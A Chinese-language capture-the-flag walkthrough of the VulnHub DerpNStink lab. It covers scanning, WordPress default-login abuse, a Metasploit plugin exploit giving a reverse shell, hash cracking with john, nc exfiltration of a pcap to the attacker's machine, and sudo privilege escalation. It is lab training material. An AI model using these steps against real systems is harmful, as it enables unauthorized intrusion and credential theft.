本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/derpnstink-1,221/
使用namp进行扫描,nmap -n -p- -sC -sV 192.168.56.103 -oA derpnstink.nmap
发现开放3个端口,分别是21,22,80,我们先访问下80端口
通过访问此web,在很深的div下面,找到了第一个flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
继续找下一个flag,这里继续看目标web的页面源码,看到一个js的访问结果
得知需要绑定本地hosts是可以访问一个关于derpnstink的blog,我测试绑定了本地hosts为derpnstink发现访问的效果是跟没有绑定的效果一样,那先放着,直接使用dirb http://192.168.56.103 暴力破解目标目录看看
爆破发现目录weblog,我使用IP直接加入此目录,发现访问不了,显示的是域名http://derpnstink.local/weblog/,所以此时我更改本地hosts为derpnstink.local 即可正常访问
看到此页面和底部的显示以及刚才使用dirb暴力破解的结果中含有wp-等相关字样,根据经验可知目标是个wordpress博客,所以直接尝试访问默认的管理员admin/admin页面看看
成功访问http://derpnstink.local/weblog/wp-admin 并使用默认密码登录成功。进入之后发现权限不是很大,感觉不是真正的管理员,逐尝试使用wpscan进行扫描下看看
wpscan --url http://derpnstink.local/weblog
根据上述的扫描结果可知Slideshow Gallery存在漏洞,我们直接使用metasploit进行提权看看
配置选项里面有需要配置账号和密码,这里刚好在上面测试出来默认账号和密码都是admin,所以这里很好利用,具体如下:
效果非常好,直接反弹shell了,这里提权方式很多,可以参考:
References: https://cvedetails.com/cve/CVE-2014-5460/ https://www.exploit-db.com/exploits/34681 https://wpvulndb.com/vulnerabilities/7532
通过获得的shell,直接翻看配置文件,发现了目标数据库的账号和密码
数据库账号和密码为root/mysql,那么我们直接登录目标的phpmyadmin进行操作数据库,知道phpmyadmin这个目录就是前面使用dirb进行暴力破解目录的时候就已经爆出来了
访问:http://derpnstink.local/php/phpmyadmin 并登录
访问wp_posts表发现flag2.txt
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
继续翻看有没有其他重要信息
发现有两个账户和加密了的密码,尝试直接破解unclestinky的密码,使用john去跑rockyou这个字典
将密码$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41保存到hashes.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
得出用户unclestinky的密码为wedgie57,登录目标WordPress同样发现flag2,这里继续找第三个flag,先从拿到的shell中确定目标靶机存在几个普通用户
确认存在用户stinky和mrderp ,那么再试试用上面获得的密码wedgie57去登录目标靶机的ssh和ftp,最终确认用户stinky的密码刚好是wedgie57
经过上述一序列操作,翻遍ftp的所有目录,找到key.txt和其他文件,将其全部下载到本地kali中翻看
查看了下载下来的文件,觉得这个key非常有用,试试直接使用这个key当作ssh的私钥直接登录目标靶机
做了上述操作,居然成功ssh目标靶机,上去翻看文件, 最终找到了flag3
继续翻看,发现Document目录下有个pcap格式的文件, 首先使用strings命令查看是否跟用户mrderp相关
发现跟用户mrderp相关,并且看上去像是是有http请求的明文内容,我们使用nc将其下载到本地下来,使用wireshark进行查看
kali执行:nc -l -p 9999 > derp.pcap 目标靶机执行:nc 192.168.56.102 9999 < derpissues.pcap
本地使用wireshark查看该数据包,要想快速知道账号和密码,前提是知道目标登录的是web,登录一般形式都是POST请求,所以我们使用wireshark进行过滤,只看POST请求那么就可以快速找到用户名和密码,具体如下:
过滤好POST请求之后,瞬间确定了目标靶机用户mrderp的密码为derpderpderpderpderpderpderp , 这里还有另外两种方法,具体如下:
tcpdump -qns 0 -X -r derp.pcap > bmfxderp.txt
tcpdump -nt -r derp.pcap -A 2>/dev/null | grep -P 'pwd='
得到密码之后直接使用账号和密码通过ssh登录目标靶机
成功登录,然后翻看家目录的所有文件,在Desktop目录下发现一个文件提示信息
根据提示的意思是当前用户有sudo提权相关的提示,可以访问https://pastebin.com/RzK9WfGw 得到帮助信息
然后本地sudo -l查看sudo的提权信息
目前已经确认提权路径就在上述给的文件夹路径,但是看了下并没有文件夹binaries,那么就直接新建一个这个文件夹,然后新建一个文件derpy类似的名称即可,最后给其执行权限,sudo执行即可提权,最终我做了如下操作,具体如下:
这里的derypy.sh里面的内容可以是反弹shell的内容,也可以是bash -i或者/bin/bash都可以
